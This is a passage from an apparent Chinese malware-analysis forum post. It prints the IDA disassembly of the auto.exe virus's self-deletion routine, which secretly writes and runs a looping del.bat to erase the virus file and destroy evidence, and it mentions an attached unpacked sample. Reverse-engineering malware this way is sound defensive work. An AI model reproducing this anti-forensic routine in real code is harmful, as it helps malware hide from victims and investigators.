0040162A push edi ; dwMilliseconds
0040162B call esi ; Sleep
0040162D push edi ; dwMilliseconds
0040162E call esi ; Sleep
00401630 push edi ; dwMilliseconds
00401631 call esi ; Sleep
00401633 xor eax, eax
00401635 push eax ; hTemplateFile
00401636 push eax ; dwFlagsAndAttributes
00401637 push 2 ; dwCreationDisposition
00401639 push eax ; lpSecurityAttributes
0040163A push eax ; dwShareMode
0040163B lea eax, [ebp+var_szDelCmdLine]
00401641 push 40000000h ; dwDesiredAccess
00401646 push eax ; lpFileName
00401647 call ds:CreateFileA ; 建立del.bat毁灭证据
0040164D cmp eax, 0FFFFFFFFh
00401650 mov [ebp+hObject], eax
00401653 jz loc_40181E
00401659 lea eax, [ebp+Buffer]
0040165F push offset a@echoOff ; "@echo off\r\n"
00401664 push eax ; 偷偷干,屏幕上不准显示
00401665 call strcpy
0040166A pop ecx
0040166B pop ecx
0040166C push edi ; dwMilliseconds
0040166D call esi ; Sleep
0040166F push edi ; dwMilliseconds
00401670 call esi ; Sleep
00401672 push edi ; dwMilliseconds
00401673 call esi ; Sleep
00401675 push edi ; dwMilliseconds
00401676 call esi ; Sleep
00401678 push edi ; dwMilliseconds
00401679 call esi ; Sleep
0040167B push edi ; dwMilliseconds
0040167C call esi ; Sleep
0040167E push edi ; dwMilliseconds
0040167F call esi ; Sleep
00401681 push edi ; dwMilliseconds
00401682 call esi ; Sleep
00401684 push edi ; dwMilliseconds
00401685 call esi ; Sleep
00401687 push edi ; dwMilliseconds
00401688 call esi ; Sleep
0040168A push edi ; dwMilliseconds
0040168B call esi ; Sleep
0040168D push edi ; dwMilliseconds
0040168E call esi ; Sleep
00401690 mov esi, ds:lstrlen
00401696 lea eax, [ebp+NumberOfBytesWritten]
00401699 push 0 ; lpOverlapped
0040169B push eax ; lpNumberOfBytesWritten
0040169C lea eax, [ebp+Buffer]
004016A2 push eax
004016A3 call esi ; lstrlen
004016A5 mov edi, ds:WriteFile
004016AB push eax ; nNumberOfBytesToWrite
004016AC lea eax, [ebp+Buffer]
004016B2 push eax ; lpBuffer
004016B3 push [ebp+hObject] ; hFile
004016B6 call edi ; WriteFile
004016B8 lea eax, [ebp+Buffer]
004016BE push offset aSelfkill ; ":selfkill\r\n"
004016C3 push eax
004016C4 call strcpy
004016C9 pop ecx
004016CA lea eax, [ebp+NumberOfBytesWritten]
004016CD pop ecx
004016CE push 0 ; lpOverlapped
004016D0 push eax ; lpNumberOfBytesWritten
004016D1 lea eax, [ebp+Buffer]
004016D7 push eax
004016D8 call esi ; lstrlen
004016DA push eax ; nNumberOfBytesToWrite
004016DB lea eax, [ebp+Buffer]
004016E1 push eax ; lpBuffer
004016E2 push [ebp+hObject] ; hFile
004016E5 call edi ; WriteFile
004016E7 lea eax, [ebp+Buffer]
004016ED push offset aDelFQ ; "del /F /Q \""
004016F2 push eax ; 干完坏事就自杀
004016F3 call strcpy
004016F8 pop ecx
004016F9 lea eax, [ebp+NumberOfBytesWritten]
004016FC pop ecx
004016FD push 0 ; lpOverlapped
004016FF push eax ; lpNumberOfBytesWritten
00401700 lea eax, [ebp+Buffer]
00401706 push eax
00401707 call esi ; lstrlen
00401709 push eax ; nNumberOfBytesToWrite
0040170A lea eax, [ebp+Buffer]
00401710 push eax ; lpBuffer
00401711 push [ebp+hObject] ; hFile
00401714 call edi ; WriteFile
00401716 lea eax, [ebp+var_szFilename] ; 病毒文件名
0040171C push eax
0040171D lea eax, [ebp+Buffer]
00401723 push eax
00401724 call strcpy
00401729 pop ecx
0040172A lea eax, [ebp+NumberOfBytesWritten]
0040172D pop ecx
0040172E push 0 ; lpOverlapped
00401730 push eax ; lpNumberOfBytesWritten
00401731 lea eax, [ebp+Buffer]
00401737 push eax
00401738 call esi ; lstrlen
0040173A push eax ; nNumberOfBytesToWrite
0040173B lea eax, [ebp+Buffer]
00401741 push eax ; lpBuffer
00401742 push [ebp+hObject] ; hFile
00401745 call edi ; WriteFile
00401747 lea eax, [ebp+Buffer]
0040174D push offset asc_410B44 ; "\"\r\n"
00401752 push eax
00401753 call ebx ; lstrcpy
00401755 lea eax, [ebp+NumberOfBytesWritten]
00401758 push 0 ; lpOverlapped
0040175A push eax ; lpNumberOfBytesWritten
0040175B lea eax, [ebp+Buffer]
00401761 push eax
00401762 call esi ; lstrlen
00401764 push eax ; nNumberOfBytesToWrite
00401765 lea eax, [ebp+Buffer]
0040176B push eax ; lpBuffer
0040176C push [ebp+hObject] ; hFile
0040176F call edi ; WriteFile
00401771 lea eax, [ebp+Buffer]
00401777 push offset aIfExist ; "if exist \""
0040177C push eax
0040177D call ebx ; lstrcpy
0040177F lea eax, [ebp+NumberOfBytesWritten]
00401782 push 0 ; lpOverlapped
00401784 push eax ; lpNumberOfBytesWritten
00401785 lea eax, [ebp+Buffer]
0040178B push eax
0040178C call esi ; lstrlen
0040178E push eax ; nNumberOfBytesToWrite
0040178F lea eax, [ebp+Buffer]
00401795 push eax ; lpBuffer
00401796 push [ebp+hObject] ; hFile
00401799 call edi ; WriteFile
0040179B lea eax, [ebp+var_szFilename] ; 病毒文件名
004017A1 push eax
004017A2 lea eax, [ebp+Buffer]
004017A8 push eax
004017A9 call ebx ; lstrcpy
004017AB lea eax, [ebp+NumberOfBytesWritten]
004017AE push 0 ; lpOverlapped
004017B0 push eax ; lpNumberOfBytesWritten
004017B1 lea eax, [ebp+Buffer]
004017B7 push eax
004017B8 call esi ; lstrlen
004017BA push eax ; nNumberOfBytesToWrite
004017BB lea eax, [ebp+Buffer]
004017C1 push eax ; lpBuffer
004017C2 push [ebp+hObject] ; hFile
004017C5 call edi ; WriteFile
004017C7 lea eax, [ebp+Buffer]
004017CD push offset aGotoSelfkill ; "\" goto selfkill\r\n"
004017D2 push eax
004017D3 call ebx ; lstrcpy
004017D5 lea eax, [ebp+NumberOfBytesWritten]
004017D8 push 0 ; lpOverlapped
004017DA push eax ; lpNumberOfBytesWritten
004017DB lea eax, [ebp+Buffer]
004017E1 push eax
004017E2 call esi ; lstrlen
004017E4 push eax ; nNumberOfBytesToWrite
004017E5 lea eax, [ebp+Buffer]
004017EB push eax ; lpBuffer
004017EC push [ebp+hObject] ; hFile
004017EF call edi ; WriteFile
004017F1 lea eax, [ebp+Buffer]
004017F7 push offset dword_410B18
004017FC push eax
004017FD call ebx ; lstrcpy
004017FF push 0 ; lpOverlapped
00401801 lea eax, [ebp+NumberOfBytesWritten]
00401804 push eax ; lpNumberOfBytesWritten
00401805 lea eax, [ebp+Buffer]
0040180B push eax
0040180C call esi ; lstrlen
0040180E push eax ; nNumberOfBytesToWrite
0040180F lea eax, [ebp+Buffer]
00401815 push eax ; lpBuffer
00401816 push [ebp+hObject] ; hFile
00401819 call edi ; WriteFile
0040181B push 1
0040181D pop edi
0040181E
0040181E loc_40181E:
0040181E push [ebp+hObject] ; hObject
00401821 call ds:CloseHandle
00401827 lea eax, [ebp+var_szDelCmdLine]
0040182D push SW_HIDE ; uCmdShow
0040182F push eax ; lpCmdLine
00401830 call ds:WinExec ; 执行del.bat
00401836
00401836 loc_401836:
00401836 mov eax, edi
00401838
00401838 loc_401838:
00401838 pop edi
00401839 pop esi
0040183A pop ebx
0040183B leave
0040183C retn
0040183C Del_InfectingHost endp
}
00402BFA
【总结】
判处 auto.exe 病毒死刑,剥夺政治权利终身,此审为终审判决,不得上诉。
加个脱了壳的尸体:
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)